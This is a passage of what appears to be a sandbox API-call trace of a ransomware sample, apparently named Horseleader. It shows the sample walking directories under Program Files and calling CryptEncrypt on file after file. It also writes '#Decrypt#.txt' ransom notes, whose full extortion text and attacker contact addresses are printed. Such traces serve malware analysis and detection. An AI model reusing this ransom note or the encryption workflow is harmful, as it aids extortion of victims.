wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\*") returned 42 [0250.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0250.965] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.965] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\.") returned 42 [0250.965] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.965] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0250.966] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.966] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\..") returned 43 [0250.966] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.966] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.966] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ado", cAlternateFileName="")) returned 1 [0250.966] lstrcmpiW (lpString1="ado", lpString2="Windows") returned -1 [0250.966] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 44 [0250.966] lstrcmpW (lpString1="ado", lpString2=".") returned 1 [0250.966] lstrcmpW (lpString1="ado", lpString2="..") returned 1 [0250.966] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.966] GetProcessHeap () returned 0x780000 [0250.966] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0250.966] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*") returned 46 [0250.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.969] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.969] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.") returned 46 
[0250.969] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.969] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.969] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.969] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\..") returned 47 [0250.969] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.970] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.970] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c91ed4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa4c91ed4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa06f97f7, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x3912, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="adojavas.inc", cAlternateFileName="")) returned 1 [0250.970] lstrcmpiW (lpString1="adojavas.inc", lpString2="Windows") returned -1 [0250.970] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 57 [0250.970] StrStrIW (lpFirst="adojavas.inc", lpSrch=".horseleader") returned 0x0 [0250.970] lstrcmpW (lpString1="adojavas.inc", lpString2="#Decrypt#.txt") returned 1 [0250.970] lstrcmpW (lpString1="adojavas.inc", lpString2="_uninstalling_.png") returned 1 [0250.970] lstrlenW 
(lpString=".testttjffg") returned 11 [0250.970] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc", lpSrch=".testttjffg") returned 0x0 [0250.970] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.970] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.970] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.971] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4085067, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa4085067, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa0661283, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x3a67, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="adovbs.inc", cAlternateFileName="")) returned 1 [0250.971] lstrcmpiW (lpString1="adovbs.inc", lpString2="Windows") returned -1 [0250.971] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 55 [0250.971] StrStrIW (lpFirst="adovbs.inc", lpSrch=".horseleader") returned 0x0 [0250.971] lstrcmpW (lpString1="adovbs.inc", lpString2="#Decrypt#.txt") returned 1 [0250.971] lstrcmpW (lpString1="adovbs.inc", lpString2="_uninstalling_.png") returned 1 [0250.971] lstrlenW (lpString=".testttjffg") returned 11 [0250.971] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\System\\ado\\adovbs.inc", lpSrch=".testttjffg") returned 0x0 [0250.972] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.972] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.972] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0250.972] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0250.972] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US") returned 50 [0250.972] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0250.972] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0250.972] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.972] GetProcessHeap () returned 0x780000 [0250.972] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.972] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*") returned 52 [0250.972] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0250.973] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.973] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\.") returned 52 [0250.973] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.973] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="..", cAlternateFileName="")) returned 1 [0250.973] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.973] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\..") returned 53 [0250.973] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.973] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.973] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 1 [0250.973] lstrcmpiW (lpString1="msader15.dll.mui", lpString2="Windows") returned -1 [0250.974] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 67 [0250.974] StrStrIW (lpFirst="msader15.dll.mui", lpSrch=".horseleader") returned 0x0 [0250.974] lstrcmpW (lpString1="msader15.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0250.974] lstrcmpW (lpString1="msader15.dll.mui", lpString2="_uninstalling_.png") returned 1 [0250.974] lstrlenW (lpString=".testttjffg") returned 11 [0250.974] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui", lpSrch=".testttjffg") returned 0x0 [0250.974] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.974] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.975] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, 
ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 0 [0250.975] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.975] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\#Decrypt#.txt") returned 64 [0250.975] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.976] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.976] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0250.978] lstrlenA (lpString="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") returned 1368 [0250.978] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0250.978] CloseHandle (hObject=0x158) returned 1 [0250.978] GetProcessHeap () returned 0x780000 [0250.978] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.978] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6129cc5, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x6129cc5, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x80fe7780, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0250.978] lstrcmpiW (lpString1="msader15.dll", lpString2="Windows") returned -1 [0250.978] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 57 [0250.978] StrStrIW (lpFirst="msader15.dll", lpSrch=".horseleader") returned 0x0 [0250.978] lstrcmpW (lpString1="msader15.dll", lpString2="#Decrypt#.txt") returned 1 [0250.978] lstrcmpW (lpString1="msader15.dll", lpString2="_uninstalling_.png") returned 1 [0250.978] lstrlenW (lpString=".testttjffg") returned 11 [0250.979] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\System\\ado\\msader15.dll", lpSrch=".testttjffg") returned 0x0 [0250.979] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.979] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.979] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7da10b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8f7da10b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8f80026c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x16e000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado15.dll", cAlternateFileName="")) returned 1 [0250.979] lstrcmpiW (lpString1="msado15.dll", lpString2="Windows") returned -1 [0250.979] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 56 [0250.979] StrStrIW (lpFirst="msado15.dll", lpSrch=".horseleader") returned 0x0 [0250.979] lstrcmpW (lpString1="msado15.dll", lpString2="#Decrypt#.txt") returned 1 [0250.979] lstrcmpW (lpString1="msado15.dll", lpString2="_uninstalling_.png") returned 1 [0250.979] lstrlenW (lpString=".testttjffg") returned 11 [0250.979] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll", lpSrch=".testttjffg") returned 0x0 [0250.980] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.980] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.981] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833eacc3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x833eacc3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x833eacc3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado20.tlb", cAlternateFileName="")) returned 1 [0250.981] lstrcmpiW (lpString1="msado20.tlb", lpString2="Windows") returned -1 [0250.981] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 56 [0250.981] StrStrIW (lpFirst="msado20.tlb", lpSrch=".horseleader") returned 0x0 [0250.981] lstrcmpW (lpString1="msado20.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.981] lstrcmpW (lpString1="msado20.tlb", lpString2="_uninstalling_.png") returned 1 [0250.981] lstrlenW (lpString=".testttjffg") returned 11 [0250.981] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb", lpSrch=".testttjffg") returned 0x0 [0250.981] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.981] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.981] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833eacc3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x833eacc3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x833eacc3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado21.tlb", cAlternateFileName="")) returned 1 [0250.982] lstrcmpiW (lpString1="msado21.tlb", lpString2="Windows") returned -1 [0250.982] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 56 [0250.982] StrStrIW (lpFirst="msado21.tlb", lpSrch=".horseleader") returned 0x0 [0250.982] lstrcmpW (lpString1="msado21.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.982] lstrcmpW (lpString1="msado21.tlb", lpString2="_uninstalling_.png") returned 1 [0250.982] lstrlenW (lpString=".testttjffg") returned 11 [0250.982] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb", lpSrch=".testttjffg") returned 0x0 [0250.982] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.982] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.982] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83410e23, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x83410e23, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83410e23, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msado25.tlb", cAlternateFileName="")) returned 1 [0250.982] lstrcmpiW (lpString1="msado25.tlb", lpString2="Windows") returned -1 [0250.982] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 56 [0250.983] StrStrIW (lpFirst="msado25.tlb", lpSrch=".horseleader") returned 0x0 [0250.983] lstrcmpW (lpString1="msado25.tlb", lpString2="#Decrypt#.txt") returned 1 [0250.983] lstrcmpW (lpString1="msado25.tlb", lpString2="_uninstalling_.png") returned 1 [0250.983] lstrlenW (lpString=".testttjffg") returned 11 [0250.983] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb", lpSrch=".testttjffg") returned 0x0 [0250.983] CryptGenRandom (in: hProv=0x7c6248, 